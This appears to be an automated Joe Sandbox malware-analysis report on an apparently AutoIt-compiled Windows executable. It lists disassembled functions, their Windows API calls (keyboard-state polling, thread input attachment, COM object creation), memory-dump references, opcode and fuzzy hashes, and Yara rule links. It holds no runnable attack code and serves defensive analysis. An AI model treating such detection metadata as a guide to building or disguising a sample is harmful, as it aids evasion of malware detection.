                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: State$Async$Keyboard
                                                                        • String ID:
                                                                        • API String ID: 541375521-0
                                                                        • Opcode ID: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                                        • Instruction ID: 827c2ee343902556a703916e37c968ecd50c133e95067caf6822082f003788d3
                                                                        • Opcode Fuzzy Hash: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                                        • Instruction Fuzzy Hash: 27412B34A047C969FF31A6A4C8043A7BBA16FA1314F04805FD5C5477C1DBED99C8C7A9
                                                                        Function 00470B6C Relevance: 16.6, APIs: 11, Instructions: 125COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: InitVariant$_malloc_wcscpy_wcslen
                                                                        • String ID:
                                                                        • API String ID: 3413494760-0
                                                                        • Opcode ID: 6d788ec2be1997d9cec64eaa256864158e09ad3f6105efb05e468561ef8a9f6c
                                                                        • Instruction ID: 93a03e1dde4748921c3f7e50244c45dc9774a8ad470eaa8d68eb3f4e8808ad8d
                                                                        • Opcode Fuzzy Hash: 6d788ec2be1997d9cec64eaa256864158e09ad3f6105efb05e468561ef8a9f6c
                                                                        • Instruction Fuzzy Hash: 33414BB260070AAFC754DF69C880A86BBE8FF48314F00862AE619C7750D775E564CBE5
                                                                        Function 004542ED Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 271libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: AddressProc_free_malloc$_strcat_strlen
                                                                        • String ID: AU3_FreeVar
                                                                        • API String ID: 2634073740-771828931
                                                                        • Opcode ID: b7b62cf44ead268743cea15c23fa0702c80810b5d7796ec40f0430e9877b9643
                                                                        • Instruction ID: 8d08e60933d1045585c44e473594da8d0bbfd8a8652ecee4fcef853dc29158a1
                                                                        • Opcode Fuzzy Hash: b7b62cf44ead268743cea15c23fa0702c80810b5d7796ec40f0430e9877b9643
                                                                        • Instruction Fuzzy Hash: 00B1ADB4A00206DFCB00DF55C880A6AB7A5FF88319F2485AEED058F352D739ED95CB94
                                                                        Function 0046C5FA Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 208comCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CoInitialize.OLE32 ref: 0046C63A
                                                                        • CoUninitialize.OLE32 ref: 0046C645
                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                          • Part of subcall function 0044CB87: CreateDispTypeInfo.OLEAUT32(?,00000800,?), ref: 0044CBD4
                                                                          • Part of subcall function 0044CB87: CreateStdDispatch.OLEAUT32(00000000,?,?,?), ref: 0044CBF4
                                                                        • CLSIDFromProgID.OLE32(00000000,?), ref: 0046C694
                                                                        • CLSIDFromString.OLE32(00000000,?), ref: 0046C6A4
                                                                        • CoCreateInstance.OLE32(?,00000000,00000017,00482998,?), ref: 0046C6CD
                                                                        • IIDFromString.OLE32(?,?), ref: 0046C705
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: CreateFrom$String$DispDispatchInfoInitializeInstanceProgTypeUninitialize_malloc
                                                                        • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                        • API String ID: 2294789929-1287834457
                                                                        • Opcode ID: 8665205133a3f3d83065b0d9f42e266eef00d51d9f24292ab734099309a65fda
                                                                        • Instruction ID: adb6a6f601bf1a612e569d1fac1689f55b30b767fcafa950e0578031a668eb85
                                                                        • Opcode Fuzzy Hash: 8665205133a3f3d83065b0d9f42e266eef00d51d9f24292ab734099309a65fda
                                                                        • Instruction Fuzzy Hash: B861BC712043019FD710EF21D885B7BB3E8FB84715F10891EF9859B241E779E909CBAA
                                                                        Function 004710F1 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 157windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00456391: GetCursorPos.USER32(?), ref: 004563A6
                                                                          • Part of subcall function 00456391: ScreenToClient.USER32(?,?), ref: 004563C3
                                                                          • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456400
                                                                          • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456410
                                                                        • DefDlgProcW.USER32(?,00000205,?,?), ref: 00471145
                                                                        • ImageList_DragLeave.COMCTL32(00000000), ref: 00471163
                                                                        • ImageList_EndDrag.COMCTL32 ref: 00471169
                                                                        • ReleaseCapture.USER32 ref: 0047116F
                                                                        • SetWindowTextW.USER32(?,00000000), ref: 00471206
                                                                        • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00471216
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                                                                        • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                        • API String ID: 2483343779-2107944366
                                                                        • Opcode ID: 0c0f1ff16893fa866466cf5bd33a163e2c592d09522a7afef5934b76f638d362
                                                                        • Instruction ID: f70d9246110d4513cc5ea0640624bfdb04bec8758509bedf4130776013c57ff9
                                                                        • Opcode Fuzzy Hash: 0c0f1ff16893fa866466cf5bd33a163e2c592d09522a7afef5934b76f638d362
                                                                        • Instruction Fuzzy Hash: D751E5706002109FD700EF59CC85BAF77A5FB89310F004A6EF945A72E2DB789D45CBAA
                                                                        Function 004505F0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 147windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004506A0
                                                                        • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 004506B4
                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004506D5
                                                                        • _wcslen.LIBCMT ref: 00450720
                                                                        • _wcscat.LIBCMT ref: 00450733
                                                                        • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045074C
                                                                        • SendMessageW.USER32(?,00001061,?,?), ref: 0045077E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Window_wcscat_wcslen
                                                                        • String ID: -----$SysListView32
                                                                        • API String ID: 4008455318-3975388722
                                                                        • Opcode ID: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                                        • Instruction ID: d83f74bd31ff7b91e94eebeff09b40632409ca0fd113a8de7250d6f1aa6a1b31
                                                                        • Opcode Fuzzy Hash: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                                        • Instruction Fuzzy Hash: 9C51D470500308ABDB24CF64CD89FEE77A5EF98304F10065EF944A72C2D3B99959CB58
                                                                        Function 00469BF3 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 88windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                        • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469C73
                                                                        • GetDlgCtrlID.USER32(00000000), ref: 00469C84
                                                                        • GetParent.USER32 ref: 00469C98
                                                                        • SendMessageW.USER32(00000000,?,00000111), ref: 00469C9F
                                                                        • GetDlgCtrlID.USER32(00000000), ref: 00469CA5
                                                                        • GetParent.USER32 ref: 00469CBC
                                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 00469CC3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$CtrlParent$_memmove_wcslen
                                                                        • String ID: ComboBox$ListBox
                                                                        • API String ID: 2360848162-1403004172
                                                                        • Opcode ID: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                                        • Instruction ID: b77daa4920d68b7dc7b38413de7e2b04daab878370679d8231203fb1b5b646ea
                                                                        • Opcode Fuzzy Hash: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                                        • Instruction Fuzzy Hash: 0121E7716001187BDB00AB69CC85ABF779CEB85320F00855BFA149B2D1D6B8D845C7A5
                                                                        Function 0045DC4C Relevance: 15.2, APIs: 10, Instructions: 190COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: _wcscpy$FolderUninitialize$BrowseDesktopFromInitializeListMallocPath
                                                                        • String ID:
                                                                        • API String ID: 262282135-0
                                                                        • Opcode ID: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                                        • Instruction ID: f209a7e015878e5ef66622a864ec89938c936514b9877fb167e893f071c19078
                                                                        • Opcode Fuzzy Hash: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                                        • Instruction Fuzzy Hash: 25718275900208AFCB14EF95C9849DEB7B9EF88304F00899AE9099B312D735EE45CF64
                                                                        Function 00448123 Relevance: 15.2, APIs: 10, Instructions: 187windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004481A8
                                                                        • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004481AB
                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 004481CF
                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481F2
                                                                        • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00448266
                                                                        • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482B4
                                                                        • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482CF
                                                                        • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482F1
                                                                        • SendMessageW.USER32(?,0000101E,00000001,?), ref: 00448308
                                                                        • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448320
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$LongWindow
                                                                        • String ID:
                                                                        • API String ID: 312131281-0
                                                                        • Opcode ID: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                                        • Instruction ID: c7c5d5d6f9bf0949bb943eac7ac5a8ec30049dd2ce11923e35461b50cec8bdb0
                                                                        • Opcode Fuzzy Hash: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                                        • Instruction Fuzzy Hash: 97617C70A00208AFEB10DF94DC81FEE77B9FF49714F10429AF914AB291DBB5AA41CB54
                                                                        Function 00448D62 Relevance: 15.2, APIs: 10, Instructions: 174windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                                                                        • SendMessageW.USER32(76C223D0,00001001,00000000,?), ref: 00448E16
                                                                        • SendMessageW.USER32(76C223D0,00001026,00000000,?), ref: 00448E25
                                                                          • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                                                        • String ID:
                                                                        • API String ID: 3771399671-0
                                                                        • Opcode ID: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                                                        • Instruction ID: 7c26134f999fedcb31daf2d1c178305a5bad5d5d588b7e0560cc3c70a69cf84e
                                                                        • Opcode Fuzzy Hash: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                                                        • Instruction Fuzzy Hash: C7511570300214ABF720DF24DC85FAE77A9EF14724F10491EFA59AB291CB79E9498B18
                                                                        Function 00434621 Relevance: 15.1, APIs: 10, Instructions: 98threadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetCurrentThreadId.KERNEL32 ref: 00434643
                                                                        • GetForegroundWindow.USER32(00000000), ref: 00434655
                                                                        • GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
                                                                        • GetWindowThreadProcessId.USER32(?,?), ref: 0043467F
                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434698
                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004346A6
                                                                        • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
                                                                        • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434707
                                                                        • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434712
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                        • String ID:
                                                                        • API String ID: 2156557900-0
                                                                        • Opcode ID: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                                        • Instruction ID: 33c2ceff45d8cb0672f592c0823183733d26e7ad7419b63083ab10cfbc882f35
                                                                        • Opcode Fuzzy Hash: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                                        • Instruction Fuzzy Hash: 98313EB2600204BFDB11DF69DC859AEB7A9FB9A310F00552AF905D7250E778AD40CB6C
                                                                        Function 0046943F Relevance: 14.3, APIs: 2, Strings: 6, Instructions: 287COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                        • API String ID: 0-1603158881
                                                                        • Opcode ID: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                                        • Instruction ID: 400245e8055df5988f0e80dfbae95eacb55e3b8a933f722a5dc1e2c8929bf265
                                                                        • Opcode Fuzzy Hash: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                                        • Instruction Fuzzy Hash: FAA162B5800204ABDF00EF61D8C1BEA3368AF54349F58857BEC096B146EB7D6909D77A
                                                                        Function 00401CB0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 240COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D06
                                                                        • DestroyWindow.USER32(?), ref: 00426F50
                                                                        • UnregisterHotKey.USER32(?), ref: 00426F77
                                                                        • FreeLibrary.KERNEL32(?), ref: 0042701F
                                                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00427050
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                                                                        • String ID: close all$Wu
                                                                        • API String ID: 4174999648-1790509019
                                                                        • Opcode ID: 4fd900de9a28da208b58a3ba22ecdd4c26f042792ef41b4fe823b5ed5eb78ac9
                                                                        • Instruction ID: 89fc9d45334329c88beddca7a6314a06ce6e15860ee53b488cbf8147960762b2
                                                                        • Opcode Fuzzy Hash: 4fd900de9a28da208b58a3ba22ecdd4c26f042792ef41b4fe823b5ed5eb78ac9
                                                                        • Instruction Fuzzy Hash: 9BA1C174710212CFC710EF15C985B5AF3A8BF48304F5045AEE909672A2CB78BD96CF99
                                                                        Function 004485CB Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateMenu.USER32 ref: 00448603
                                                                        • SetMenu.USER32(?,00000000), ref: 00448613
                                                                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448697
                                                                        • IsMenu.USER32(?), ref: 004486AB
                                                                        • CreatePopupMenu.USER32 ref: 004486B5
                                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004486EC
                                                                        • DrawMenuBar.USER32 ref: 004486F5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
